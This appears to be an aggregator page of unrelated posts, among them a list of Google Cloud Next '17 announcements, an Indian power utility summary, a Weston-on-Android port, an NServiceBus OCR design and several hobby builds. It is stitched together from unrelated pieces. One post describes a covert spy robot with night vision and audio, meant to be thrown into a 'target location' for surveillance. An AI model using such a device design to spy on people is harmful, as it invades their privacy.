43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.

100-announcements-16

In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer With Drive File Steam, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on the Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

50. Hangouts Chat (EAP) - Hangouts Chat is an intelligent communication app in Hangouts with dedicated, virtual rooms that connect cross-functional enterprise teams. Hangouts Chat integrates with G Suite apps like Drive and Docs, as well as photos, videos and other third-party enterprise apps.

51. @meet - @meet is an intelligent bot built on top of the Hangouts platform that uses natural language processing and machine learning to automatically schedule meetings for your team with Hangouts Meet and Google Calendar.

52. Gmail Add-ons for G Suite (Developer Preview) - Gmail Add-ons provide a way to surface the functionality of your app or service directly in Gmail. With Add-ons, developers only build their integration once, and it runs natively in Gmail on web, Android and iOS.

53. Edit Opportunities in Google Sheets - with Edit Opportunities in Google Sheets, sales reps can sync a Salesforce Opportunity List View to Sheets to bulk edit data and changes are synced automatically to Salesforce, no upload required.

54. Jamboard - Our whiteboard in the cloud goes GA in May! Jamboard merges the worlds of physical and digital creativity. It’s real time collaboration on a brilliant scale, whether your team is together in the conference room or spread all over the world.

100-announcements-17

Building on the momentum from a growing number of businesses using Chrome digital signage and kiosks, we added new management tools and APIs in addition to introducing support for Android Kiosk apps on supported Chrome devices. 

55. Android Kiosk Apps for Chrome - Android Kiosk for Chrome lets users manage and deploy Chrome digital signage and kiosks for both web and Android apps. And with Public Session Kiosks, IT admins can now add a number of Chrome packaged apps alongside hosted apps.

56. Chrome Kiosk Management Free trial - This free trial gives customers an easy way to test out Chrome for signage and kiosk deployments.

57. Chrome Device Management (CDM) APIs for Kiosks - These APIs offer programmatic access to various Kiosk policies. IT admins can schedule a device reboot through the new APIs and integrate that functionality directly in a third- party console.

58. Chrome Stability API - This new API allows Kiosk app developers to improve the reliability of the application and the system.

100-announcements-2

Attendees at Google Cloud Next ‘17 heard stories from many of our valued customers:

59. Colgate - Colgate-Palmolive partnered with Google Cloud and SAP to bring thousands of employees together through G Suite collaboration and productivity tools. The company deployed G Suite to 28,000 employees in less than six months.

60. Disney Consumer Products & Interactive (DCPI) - DCPI is on target to migrate out of its legacy infrastructure this year, and is leveraging machine learning to power next generation guest experiences.

61. eBay - eBay uses Google Cloud technologies including Google Container Engine, Machine Learning and AI for its ShopBot, a personal shopping bot on Facebook Messenger.

62. HSBC - HSBC is one of the world's largest financial and banking institutions and making a large investment in transforming its global IT. The company is working closely with Google to deploy Cloud DataFlow, BigQuery and other data services to power critical proof of concept projects.

63. LUSH - LUSH migrated its global e-commerce site from AWS to GCP in less than six weeks, significantly improving the reliability and stability of its site. LUSH benefits from GCP’s ability to scale as transaction volume surges, which is critical for a retail business. In addition, Google's commitment to renewable energy sources aligns with LUSH's ethical principles.

64. Oden Technologies - Oden was part of Google Cloud’s startup program, and switched its entire platform to GCP from AWS. GCP offers Oden the ability to reliably scale while keeping costs low, perform under heavy loads and consistently delivers sophisticated features including machine learning and data analytics.

65. Planet - Planet migrated to GCP in February, looking to accelerate their workloads and leverage Google Cloud for several key advantages: price stability and predictability, custom instances, first-class Kubernetes support, and Machine Learning technology. Planet also announced the beta release of their Explorer platform.

66. Schlumberger - Schlumberger is making a critical investment in the cloud, turning to GCP to enable high-performance computing, remote visualization and development velocity. GCP is helping Schlumberger deliver innovative products and services to its customers by using HPC to scale data processing, workflow and advanced algorithms.

67. The Home Depot - The Home Depot collaborated with GCP’s Customer Reliability Engineering team to migrate HomeDepot.com to the cloud in time for Black Friday and Cyber Monday. Moving to GCP has allowed the company to better manage huge traffic spikes at peak shopping times throughout the year.

68. Verizon - Verizon is deploying G Suite to more than 150,000 of its employees, allowing for collaboration and flexibility in the workplace while maintaining security and compliance standards. Verizon and Google Cloud have been working together for more than a year to bring simple and secure productivity solutions to Verizon’s workforce.

100-announcements-3

We brought together Google Cloud partners from our growing ecosystem across G Suite, GCP, Maps, Devices and Education. Our partnering philosophy is driven by a set of principles that emphasize openness, innovation, fairness, transparency and shared success in the cloud market. Here are some of our partners who were out in force at the show:

69. Accenture - Accenture announced that it has designed a mobility solution for Rentokil, a global pest control company, built in collaboration with Google as part of the partnership announced at Horizon in September.

70. Alooma - Alooma announced the integration of the Alooma service with Google Cloud SQL and BigQuery.

71. Authorized Training Partner Program - To help companies scale their training offerings more quickly, and to enable Google to add other training partners to the ecosystem, we are introducing a new track within our partner program to support their unique offerings and needs.

72. Check Point - Check Point® Software Technologies announced Check Point vSEC for Google Cloud Platform, delivering advanced security integrated with GCP as well as their joining of the Google Cloud Technology Partner Program.

73. CloudEndure - We’re collaborating with CloudEndure to offer a no cost, self-service migration tool for Google Cloud Platform (GCP) customers.

74. Coursera - Coursera announced that it is collaborating with Google Cloud Platform to provide an extensive range of Google Cloud training course. To celebrate this announcement  Coursera is offering all NEXT attendees a 100% discount for the GCP fundamentals class.

75. DocuSign - DocuSign announced deeper integrations with Google Docs.

76. Egnyte - Egnyte announced an enhanced integration with Google Docs that will allow our joint customers to create, edit, and store Google Docs, Sheets and Slides files right from within the Egnyte Connect.

77. Google Cloud Global Partner Awards - We recognized 12 Google Cloud partners that demonstrated strong customer success and solution innovation over the past year: Accenture, Pivotal, LumApps, Slack, Looker, Palo Alto Networks, Virtru, SoftBank, DoIT, Snowdrop Solutions, CDW Corporation, and SYNNEX Corporation.

78. iCharts - iCharts announced additional support for several GCP databases, free pivot tables for current Google BigQuery users, and a new product dubbed “iCharts for SaaS.”

79. Intel - In addition to the progress with Skylake, Intel and Google Cloud launched several technology initiatives and market education efforts covering IoT, Kubernetes and TensorFlow, including optimizations, a developer program and tool kits.

80. Intuit - Intuit announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

81. Liftigniter - Liftigniter is a member of Google Cloud’s startup program and focused on machine learning personalization using predictive analytics to improve CTR on web and in-app.

82. Looker - Looker launched a suite of Looker Blocks, compatible with Google BigQuery Data Transfer Service, designed to give marketers the tools to enhance analysis of their critical data.

83. Low interest loans for partners - To help Premier Partners grow their teams, Google announced that capital investment are available to qualified partners in the form of low interest loans.

84. MicroStrategy - MicroStrategy announced an integration with Google Cloud SQL for PostgreSQL and Google Cloud SQL for MySQL.

85. New incentives to accelerate partner growth - We are increasing our investments in multiple existing and new incentive programs; including, low interest loans to help Premier Partners grow their teams, increasing co-funding to accelerate deals, and expanding our rebate programs.

86. Orbitera Test Drives for GCP Partners - Test Drives allow customers to try partners’ software and generate high quality leads that can be passed directly to the partners’ sales teams. Google is offering Premier Cloud Partners one year of free Test Drives on Orbitera.

87. Partner specializations - Partners demonstrating strong customer success and technical proficiency in certain solution areas will now qualify to apply for a specialization. We’re launching specializations in application development, data analytics, machine learning and infrastructure.

88. Pivotal - GCP announced Pivotal as our first CRE technology partner. CRE technology partners will work hand-in-hand with Google to thoroughly review their solutions and implement changes to address identified risks to reliability.

89. ProsperWorks - ProsperWorks announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

90. Qwiklabs - This recent acquisition will provide Authorized Training Partners the ability to offer hands-on labs and comprehensive courses developed by Google experts to our customers.

91. Rackspace - Rackspace announced a strategic relationship with Google Cloud to become its first managed services support partner for GCP, with plans to collaborate on a new managed services offering for GCP customers set to launch later this year.

92. Rocket.Chat - Rocket.Chat, a member of Google Cloud’s startup program, is adding a number of new product integrations with GCP including Autotranslate via Translate API, integration with Vision API to screen for inappropriate content, integration to NLP API to perform sentiment analysis on public channels, integration with GSuite for authentication and a full move of back-end storage to Google Cloud Storage.

93. Salesforce - Salesforce announced Gmail Add-Ons, which are designed to integrate custom workflows into Gmail based on the context of a given email.

94. SAP - This strategic partnership includes certification of SAP HANA on GCP, new G Suite integrations and future collaboration on building machine learning features into intelligent applications like conversational apps that guide users through complex workflows and transactions.

95. Smyte - Smyte participated in the Google Cloud startup program and protects millions of actions a day on websites and mobile applications. Smyte recently moved from self-hosted Kubernetes to Google Container Engine (GKE).

96. Veritas - Veritas expanded its partnership with Google Cloud to provide joint customers with 360 Data Management capabilities. The partnership will help reduce data storage costs, increase compliance and eDiscovery readiness and accelerate the customer’s journey to Google Cloud Platform.

97. VMware Airwatch - Airwatch provides enterprise mobility management solutions for Android and continues to drive the Google Device ecosystem to enterprise customers.

98. Windows Partner Program- We’re working with top systems integrators in the Windows community to help GCP customers take full advantage of Windows and .NET apps and services on our platform.

99. Xplenty - Xplenty announced the addition of two new services from Google Cloud into their available integrations: Google Cloud Spanner and Google Cloud SQL for PostgreSQL.

100. Zoomdata - Zoomdata announced support for Google’s Cloud Spanner and PostgreSQL on GCP, as well as enhancements to the existing Zoomdata Smart Connector for Google BigQuery. With these new capabilities Zoomdata offers deeply integrated and optimized support for Google Cloud Platform’s Cloud Spanner, PostgreSQL, Google BigQuery, and Cloud DataProc services.

We’re thrilled to have so many new products and partners that can help all of our customers grow. And as our final announcement for Google Cloud Next ’17 — please save the date for Next 2018: June 4–6 in San Francisco.

I guess that makes it 101. :-)



          New Initiatives / steps taken by UGVCL to improve operational efficiency         
The Uttar Gujarat Vij Company Limited (UGVCL), a second largest state discom in Gujarat serving almost 2.9 million customers, has its network spread across an area of 49,950 Sq. Km. It was the rated the second best state power distribution utility, by the Ministry of Power (MoP), with due recognition to its excellent performance in the financial front, and ensuing operational improvement and consumer-friendly practices.

The discom is forefront in taking effective steps to improve operational efficiency and provide better services to customers. Some of the steps taken have been the introduction of system strengthening schemes, expansion of metering coverage, installation of special design transformers that help in peak load management, an insurance policy to compensate for crops destroyed by fire due to electrical line faults and launch of a photo billing system. Through these, the utility has been trying to control its rising aggregate technical and commercial (AT&C) losses but also help in peak load management through the installation of advanced metering infrastructure.

A brief outline on different types of steps taken by the discom are mentioned below:

Operational performance

The utility’s AT&C losses have been increasing since 2010-11, when these stood at 6.63%. The losses touched 10.12% in 2011-12 and 14.07% in 2012-13; with increase in losses being attributed to low metering coverage of agricultural consumers, which only accounts for 36.75% in 2012-13, as compared to 28% in 2008-09, out of the total 100% metering provided. To address this issue, the utility

  • Releasing all new agricultural connections at metered tariffs. In 2013-14, it released 22,278 new agricultural connections and additional load of 201 MW for existing agricultural connections, by installing 3000 km of HIgh Tension (HT) lines, and 55 agricultural feeders, following bifurcation of existing agricultural feeders
  • Launched a state sponsored scheme viz., Jyotigram Yojana, introduced in 2006, which ensures 24×7 three phase quality power, the utility supplies electricity to scattered farm-houses, through feeders with specially designed Jyotigram transformers
  • Installs AB conductor cables in theft prone areas, undertaking mass anti-theft drives and replacement of electromechanical meters with static meters to bring losses below 20% for feeders with higher losses   
  • Ensures timely and accurate billing in order to reduce losses by initiating photo billing system for 0.2 million consumers, sending billing information to consumers by SMS, and installation of radio frequency (RF)-based single phase meters to avoid human intervention in meter reading
  • Ensures energy conservation, cost efficiency and reduction in distribution transformer losses, the utility has introduced special design transformers – pilot advanced transformers (PATs) which provides single-phase power supply to farmers after the eighth hour; and this concept won the utility the 'India Utility Knowledge and Networking Forum (IUKAN) 2014 – Best Practice Award' under the “Innovations and Others” category.
Smart Grid Pilot

UGVCL is one of the utility short listed for smart grid initiative under MoP. The project is being undertaken in two districts – Naroda and Deesa. The Rs. 487.8 million pilot project will cover about 375 substations across these districts. The scope of the project covers AT&C loss reduction, peak load management, developing advanced metering infrastructure (AMI), optimisation of unscheduled interchange charge, reduction in meter reading cost, outage management, load forecasting, demand side management and demand response, introduction of asset management systems and power quality management.

Five consortiums were shortlisted for proof of concept (PoC) in March 2014 for demonstrating their AMI connectivity solutions with 300 meters each. On basis of evaluation of PoC and bid price, the contract for the project will be awarded in September 2014. Few challenges faced by UGVCL at tendering stage includes interoperability issues, limited expertise of Indian companies, and absence of mechanisms to test imported technologies in India.

Future Plans

In a nutshell, the utility’s future plans are aimed at strengthening and upgrading its grid infrastructure through various initiatives like adding distribution lines at 11kV and LT levels, including the smart grid pilot. Loss reduction measures and ensuring consumer satisfaction through quality power supply are its top priorities, going forward. 

Please note: Above is the summary of the article on Power Distribution Franchisee model published in PowerLine magazine, April 2014.

Posted by: Kunjan Bagdia @ pManifold

          First light from Weston on Android        
A couple of months ago, Collabora assigned me first to research and then make a proof of concept port of Wayland on Android. I had never even seen an Android before. Yesterday, Weston on Android achieved first light!
Galaxy Nexus running Weston and simple-shm.
That is a Samsung Galaxy Nexus smart phone, running a self-built image of Android 4.0.1. Weston is driving the screen, where you see the simple-shm Wayland client. There is no desktop nor wallpaper, because right now, simple-shm is the only ported client.

How is that possible? Android has no DRI, no DRM, no KMS (the DRM API), no GBM, no Mesa, and for this device the graphics drivers are proprietary and I do not have access to the closed driver source.

Fortunately, Android's self-invented graphics stack has pretty similar requirements to Weston. All it took was to write a new Android specific backend for Weston, that interfaces to the Android APIs. Writing it took roughly three days.

And the rest of the two months? I spent some time in studying Android's graphics stack, but the majority of the time sunk into porting the minimum required library dependencies, libwayland, Weston, and simple-shm to the Android platform and build environment. Simply getting the Android build system to build stuff properly took a huge effort, and then I got to write workarounds to features missing in Android's C library (Bionic). Features, that we have taken for granted on standard Linux operating systems for years. I also had to completely remove signal handling and timers from libwayland, because signalfd and timerfd interfaces do not exist in Bionic. Those need to be reinvented still.

Android has gralloc and fb hardware abstraction layer (HAL) APIs. Hardware vendors are required to implement these APIs, and provide EGL and GL support libraries. These implementations are usually closed and proprietary. On top of these is the Android wrapper-libEGL, written in C++, open source. My first thought was to use the gralloc and fb HAL APIs directly, but turned out that the wrapper-libEGL does not support using them in the application side. Instead, I was forced to use some Android C++ API (there is no C API for this, as far as I can tell) to get access to the framebuffer in an EGL-compatible way. In the end, I had to write a lot less code than using the HALs directly.

The Android backend for Weston so far only provides basic graphics output to the screen, and offers (presumably) accelerated GLES2 via EGL for the server. No input devices are hooked up yet, so you cannot interact with Weston. I do not know how to get pageflip completion events (if possible?), so that is hacked over.

Simple-shm is the only client that runs for now. There is no support for EGL/GL in Wayland clients. Toytoolkit clients are waiting for Cairo and dependencies to be ported.

The framebuffer can be used by one program at a time. Normally that program is SurfaceFlinger, the Android system compositor. To be able to run Weston, I have to kill SurfaceFlinger and make sure it stays down. Killing SurfaceFlinger also kills the whole Android UI infrastructure. You cannot even power off the phone by pressing or holding down the physical power button!

A video about simple-shm running on Galaxy Nexus:


          Proof of Concept: Choose Your Own Adventure Dashboard Widget        
Ultimately, WordPress is a tool for publishing stories, right? I’m trying to explore how to use WordPress to tell stories. WordPress backend interfaces and dashboards are extremely personal and intimate spaces, and as far as I can tell, largely unexplored as a medium. I’ve created this plugin to test a “choose your own adventure” story … Continue reading Proof of Concept: Choose Your Own Adventure Dashboard Widget
          Micro Spy Robot - DIY gallery project        

This tiny spy robot can send audio and video and includes night vision

After building my two large video controlled robots (Oberon and Goober) as well as the small sized all terrain spy robot, I wanted to take the militarization process as far as I could using inexpensive components. A spy robot needs to have a rock solid video link that is good for at least 500 feet, crystal clear amplified sound pickup, silent motor operation and night vision, so that is a lot of stuff to pack into a small area. Also note that this project was built in 2004, when affordable miniature cameras and video transmitters were kind of a rare thing to find.


I decided to build this project when I finally found a source for an ultra tiny composite video camera with a low lux CCD element that would be good for night vision. I also had a tiny 250mw audio and video transmitter that was hacked from a security system into its absolute minimum size, so the project could finally come together. This version is just a simple proof of concept prototype and will eventually be made less than half the size and have the ability to survive a throw through a window into the target location for stealthy surveillance missions in a hostile environment. The final version will also have some onboard autonomous intelligence so once it is dropped or thrown into the target location it can quickly sneak into a dark hiding spot much like the way a fleeing insect.

Since I now had the small video camera and the tiny gearbox drive motors on order, I could experiment with some possible layouts and battery pack sizes using a computer CAD program. I originally planned to use very small lithium batteries, but it was found that the current draw from all of the subsystems made the video drop out when the motors were activated, so I decided to go with sub-AA sized rechargeable nickel batteries as these were commonly available for small RC aircraft use. The next version will use a custom made lithium ion battery pack similar to the ones used in cell phones for much smaller and extended run times, but for now the goal was cheap and simple.

I also intended to have a four wheel transmission system with possible a track drive, but in later experimentation it was found that only two wheels were needed as the little motors had more than enough power to just drag the back of the robot along. The final version will probably have a custom track drive though, as the two wheels would sometimes fail to pull the tiny robot over large carpet runners due to slipping easily on the smooth surfaces. 

I originally made my own small video transmitter but it lacked audio and was very unstable as the robot moved around or when the batteries began to drain. This video transmitter is the output block of a small security camera reduced to its absolute minimal components, allowing it to send 900MHz audio and video back to a down converter. The small transmitter was very stable for several hundred feet, had very clear audio, and ran just fine from any DC power source from 6 volts to 12 volts. Having the video transmitter on a high frequency band will also help stop interference between it and the drive remote controller, which operates on the low 49MHz band.


Figure 2 - This is a tiny half inch square audio and video transmitter


It was very difficult to find a suitable micro video camera in 2004 for this project. The camera had to be black and white for use with the invisible infrared night vision LEDs, have a CCD imager rather than CMOS for clarity, and also output a standard NTSC composite signal rather than a serial bit stream. I eventually found this extremely small high resolution black and white composite camera and did a little hacking in order to remove the onboard power supply, which was 4x the size of the actual camera. This camera was perfect for this spybot now that it was reduces to only 1/4 inch square and able to run from 8 to 12 volts DC power.

Figure 3 - A micro sized NTSC composite video camera with low lux CCD

<< More on this and other DIY electronics projects: 
http://www.lucidscience.com/gal-showall.aspx
  >>



          2016 Stop Motion DEMO REEL        
I put together a demo reel showcasing my work in recent years. It's been a while since I've done this and it's kind of cool to be able to see all the various styles edited together in one video! Special shout out to my favorite composer John Dixon for The Inventor proof of concept score I'm using here. It's really awesome to be able to hear this isolated from the sound design of the trailer. So, I suggest watching the animated reel then going back and rewatching with your eyes closed to fully immerse yourself in the sound. Check out his other work here: www.manybirthdays.net Oh and hire me if you need fantastic animation!
Eric Power: 2016 DEMO REEL (Stop Motion Animator) from Eric Power on Vimeo.
          Raytheon demos high-definition, two-color 3rd Generation FLIR System        
REDSTONE ARSENAL, Ala. -  Raytheon Company's (NYSE: RTN) 3rd Generation Forward Looking Infrared (3rd Gen FLIR) Improved Target Acquisition System (ITAS) and fire control successfully achieved proof of concept in a series of laboratory and field tests. Preliminary evaluation of the impact of firing all versions of the TOW missile was also performed. "Raytheon's FLIR improvement program provides warfighters with better clarity at all ranges, allowing them to identify targets and differentiate between c...
          P7: Oxford Mosaic – A Web Publishing Platform for the Future        

P7: Oxford Mosaic – A Web Publishing Platform for the Future at IWMW 2017

IT Services at the University of Oxford has spent the last two years building a centralised web publishing platform.  This project started as a small proof of concept to prove demand, and grew into a fully-fledged multitenancy (not multi-site!) Drupal implementation hosted in the cloud with Acquia.

This project had to contend with several firsts, including: first project for a newly formed web team, first agile project for the team members, first software development to use automated deployment and testing, first home grown application to be hosted in the cloud, first project to be funded through incremental investment. At the same time, the project also encountered some familiar challenges, notably the governance framework for delivering a highly accessible SaaS platform in a 900 year-old University comprising many institutions and organisational layers.

The service has now been launched and we already have well over 50 sites built on our platform. We also have an ambitious roadmap with several significant architectural changes on the horizon to continue to evolve the platform.

Video: Session Video (youtube.com)

Sketch notes: IWMW17 Ruth Mason, Matthew Castle · mearso (mearso.co.uk)


          The case of NServiceBus long running jobs: OCR Processing.        

Designing systems using a message based architecture is awesome. Messages are a nice way to design human interactions and to model how different components in a domain interact with each other. Unfortunately, technology sometimes causes more headaches than needed. And when it comes to messaging, long running jobs are a interesting headache to deal with.

OCR Processing

Let’s say that our users need to process images and extract text using an optical character recognition system (OCR). This is done via a web interface that allows users to upload images for processing.

Images processing takes time and is done in background, when processing is completed users are notified that the results of their background jobs are ready to be consumed.

This process can be outlined as follows:

1482055831647

OCR processing can take a long time and we don’t want to hold the incoming user request until the work is completed. An interesting option is to offload the OCR work to a back-end system:

  1. User request is received by the web application
  2. Web application sends a message on a queue to a back-end processing system
  3. Back-end processing system processes the image
  4. When processing is done an event (again a message) is sent through the queuing system
  5. Web app reacts and notifies the user, e.g. via SignalR

Have we solved the issue?

Not really. Back-end processing cannot happen in the context of the incoming message, queuing systems have the concept of transactional processing that affects the time we have to process the incoming message.

There are transactional queuing systems that have to respect transaction timeouts and non-transactional queuing systems based on peek and lock (or similar) concepts meaning that a message, once picked by a processor, is locked for a certain amount of time and then released to the queue if processing doesn’t happen in that timeframe.

In such a scenario increasing the transaction, or lock, timeout is not a solution. It’s just a way to postpone the problem at a later time.

The state machine and the processor

A closer look at the business problem shows that there are two different business concerns being mixed together:

  • the need of keeping track of the state of processing jobs using a state machine:
    • Job started
    • Job in progress
    • Job failed for a known reason
    • Job failed for an unknown reason
    • Job completed successfully
  • the OCR processing work

NServiceBus Sagas are a perfect fit for the state machine. As mentioned before, due to the transactional behavior of queuing systems, messages are not a good solution when it comes to long processing time.

1482059636774

The backend is now split to handle the two concerns. It’s obvious that the communication technology across the OCR state machine and the OCR worker process cannot be queue based.

Conclusions

Using the above scenario I put together a proof of concept that shows how it can be implemented. It’s available on my GitHub account in the NServiceBus.POCs.OCRProcessing repository. This sample uses WCF to allow the OCR state machine and the OCR worker process talk to each other.

There is also an official sample showing how to design the same processing logic using Azure ServiceBus in the NServiceBus documentation.


          Helix Nebula: from Grid to Cloud and Lessons Learned So Far        

European cloud computing is taking off as can be seen in the progress of Helix Nebula. The major pan-European cloud project announced last week that they were moving from the initial proof of concept phase to the start of the two-year pilot phase, which involves expanded proofs of concept and perhaps some additional demand side partners. Just a few months into the project, the participants discuss the challenges of migrating science into the cloud.

The post Helix Nebula: from Grid to Cloud and Lessons Learned So Far appeared first on HPCwire.


          Full Duplex in Action at CableLabs 2017 Summer Conference        
For the first time in the United States, we’ll be hosting our Full Duplex (FDX) DOCSIS proof of concept with Intel at the CableLabs Summer Conference this week. We unveiled the demo this past May at ANGA.
          IllumiRoom – Coming to an Xbox Near You?        

CES News For a company with no official presence at CES this year, Microsoft still seems to be generating a fair amount of CES buzz for themselves.  First came a surprise appearance by none other than Steve Ballmer during Monday’s Qualcomm pre-show keynote, and now, an interesting proof of concept …


          Add "Office Supply Ninja" to Your Exhibit Prototyping Resume        

Thomas Edison said,  "To invent, you need a good imagination and a pile of junk."  His reference was to inventing, but he could have also been speaking about prototyping.

To me, prototyping is an iterative process that uses simple materials to help you answer questions about the physical aspects of your exhibit components (even labels!) early on in the development process.  

As I mentioned in a previous post, it's always a bit discouraging to hear museum folks say "we just don't have the time/the money/the space/the materials to do prototyping ..."  (By then I'm usually thinking "So how is setting an ill-conceived or malfunctioning exhibit component into your museum, because you didn't prototype, saving time or money?"  But I digress...)

Maybe it's just me, but I can't imagine anyone fabricating an exhibit component without trying out a quick-and-dirty version first.  So in today's post I thought I'd lay out the simple steps I use to show how quickly and inexpensively prototyping can be integrated into the beginning of any exhibit development process, and how you too can become an Office Supply Ninja!


STEP ONE:  Figure out what you want to find out.

In this case, a client wanted me to come up with an interactive version of a "Food Web" (the complex interrelationship of organisms in a particular environment, showing, basically, what eats what.)  We brainstormed a number of approaches (magnet board, touch screen computer) but finally settled on the notion of allowing visitors to construct a "Food Web Mobile" with the elements being the various organisms found (in this particular case) in a mangrove swamp.  The client was also able to provide me with a flow chart showing the relationships between organisms and a floor plan of the area where the final exhibit will be installed.

The two initial things I wanted to test or find out about from my prototype were:

1) Did people "get" the idea conceptually?  That is, did they understand the relationships and analogies between the Food Web Mobile and the actual organisms in the swamp?

2) Could they easily create different sorts of physical arrangements with the mobile that were interesting and accurate?


STEP TWO: Get out your junk!



As in the Edison quote above, it helps to have a good supply of "bits and bobs" around to prototype with.  You might not have the same sorts of junk that I've gathered up over years in the museum exhibit racket, but everyone should have access to basic office supplies (stuff like paper, tape, markers, index cards, scissors, etc.)  And really that's all you need to start assembling prototypes. (The imagination part is important, too.)


STEP THREE: Start playing around with the pieces ...


Before I even start assembling a complete rough mechanism or system I like to gather all the parts together and see if I like how they work with each other.  In the case of the Food Web Mobile prototype, I used colored file folders to represent different levels of organisms.  I initially made each color/level out of the same size pieces, but then I changed to having each color be a different size.  Finally, I used a hole punch to make the holes, and bent paper clips to serves as the hooks that would allow users to connect the pieces/organisms in different ways.


STEP FOUR:  Assemble, then iterate, iterate, iterate!


This is the part of the prototyping process that requires other people beside yourself.  Let your kids, your co-workers, your significant other, whoever (as long as it's somebody beside yourself) try out your idea. Obviously the closer your "testers" are to the expected demographic inside the museum, the better --- ideally I like to prototype somewhere inside the museum itself. 

Resist the urge to explain or over-explain your prototype.  Just watch what people do (or don't do!) with the exhibit component(s).  Take lots of notes/pictures/video.  Then take a break to change your prototype based on what you've observed and heard, and try it out again.  That's called iteration.

In this case, I saw right away that the mobile spun and balanced in interesting ways, but that meant that the labels would need to be printed on both sides of the pieces.  Fortunately, my three "in-house testers" (ages 6, 11, and 13) seemed to "get" the concept of "Food Webs" embedded into the Mobile interactive, and started coming up with interesting physical variations on their own.

For example, I initially imagined people would just try to create "balanced" arrangements of pieces on the Mobile.  But, as you can see below, the prototype testers enjoyed making "unbalanced" arrangements as well (which is fine, and makes sense conceptually as well.)   Also, we discovered that people realized that they could hang more than one "organism piece" on the lower hooks (which was also fine, and also made sense conceptually.)



STEP FIVE: Figure out what's next ... even if it's the trash can!

Do you need to change the label, or some physical arrangement of your prototype?  Using simple, inexpensive materials makes that easy.

Do you just need to junk this prototype idea?  Using simple, inexpensive materials makes it easier to move on to a new idea, too. (Much more easily than if you had spent weeks crafting and assembling something out of expensive materials from your workshop...)  It's not too surprising to see people really struggle to let a bad exhibit idea go, especially if they've spent several weeks putting it together. Quick and cheap should be your watchwords early on in the prototyping process.

In this case, I sent photos of the paper clip prototype and a short video showing people using the Food Web Mobile to the client as a "proof of concept."  They were quite pleased, and so now I will make a second-level prototype using materials more like those I expect to use in the "final" exhibit (which I'll update in a future post.)  Even so, I will still repeat the steps above of gathering materials, assembling pieces, and iterating through different versions with visitors. 

I hope you'll give this "office supply ninja" version of exhibit prototyping a try for your next project!

If you do, send me an email and I'd be happy to show off the results of ExhibiTricks readers prototyping efforts.


Don't miss out on any ExhibiTricks posts! It's easy to get updates via email or your favorite news reader. Just click the "Sign up for Free ExhibiTricks Blog Updates" link on the upper right side of the blog.

P.S. If you receive ExhibiTricks via email (or Facebook or LinkedIn) you will need to click HERE to go to the main ExhibiTricks page to make comments or view multimedia features (like videos!)
          Base X: The Isle of Anthrax        
Requisitioned from farmers, blitzed with anthrax-laden bombs in the 1940s, and made inhospitable to human and animal life for decades, the tiny Scottish island of Gruinard now serves as home to a flock of healthy sheep and a disreputable monument to the birth of biological warfare. The research conducted at Gruinard during the second World War was the very first of its kind, providing proof of concept of a natural microorganism that could be massively weaponized to inflict environmental damage a
          Having Trouble with Your IoT Project?        

Are you having problems with trying to incorporate Internet of Things technology into your new product? According to a new survey from Cisco, you’re not alone.

Projections from Gartner show IoT technology reaching more than 20 billion devices by 2020, while IDC predicts there will be 82 billion IoT endpoints by 2025.

Yet Cisco’s study – released last month at the IoT World Forum – found that 60 percent of IoT projects flounder at the proof of concept phase. Only 26 percent of companies said they had an IoT project they considered a total success. Worse still, one third of all finished projects were considered failures.

“It’s not for lack of trying,” Rowan Trollope, Cisco’s general manager for IoT, said during the forum. “But there are plenty of things we can do to get more projects out of pilot and to complete success and that’s what we’re here in London to do.”


          Eclipse Foundation announces expanded support for Eclipse Integration Platform        
Eclipse Foundation announced today new partnerships that strengthen the Eclipse Application Lifecycle Framework (ALF) Project and has made available for download of the new proof of concept code which will demo at EclipseCon 2006. The ALF Project, initiated by Serena Software in the spring of 2005, addresses the universal problem of integrating Application Lifecycle Management (ALM) technologies so that they provide full interoperability. Currently more than thirty vendors have pledged support for the ALF project and momentum continues. Recent additions to the list of those committing resources include AccuRev, PlanView and Viewtier.
          Making a Toy Caterpillar Automata        

This is a toy that looks complicated and seems like it demands real precision to work at all but honestly, it's pretty straight forward and there is a bit of wiggle room in the measurements. (Wiggle... caterpillar... never mind.)

The toy came together over several weekends of trial and error. Hubris and the occasional flying disk o' death off of the miter saw delayed me but I'm fairly confident that one of these could be made (but maybe not painted) in a day without too much grief.

So to begin at the beginning...

A few years ago I made my first caterpillar automata.  Ultimately, I  called it "The Very Hungry Caterpillar That Photographed Very Poorly." It was a gift for one of my nieces and it is still working today.




It had just six cams and I used five large beads for the body and a "doll's head" for, well, the head. There was nothing to prevent the body parts from rotating on their shafts, but that was fine.

I didn't have a set of plans for that one. It was just a proof of concept that became a finished toy. That was the same approach I took with this one; build and test as I went along.

I needed to make a toy for little one's school auction and for a friend's newborn. I wanted to try my hand with some more automata and I recently came across Woody Mammoth's version of a caterpillar toy on the web. I really liked the look of his, so it seemed like the way to go.

So... for those following along at home; here is Cam Terminology 101:
The cam is attached to a rod that runs through the pivot point. When the rod is rotated the cam turns pushing the follower up through the slide and then allowing it to fall as it continues to turn. So rotary motion gets turned into reciprocating motion. The follower is aligned over the pivot point and is always in contact with the cam.

Now on to the build.


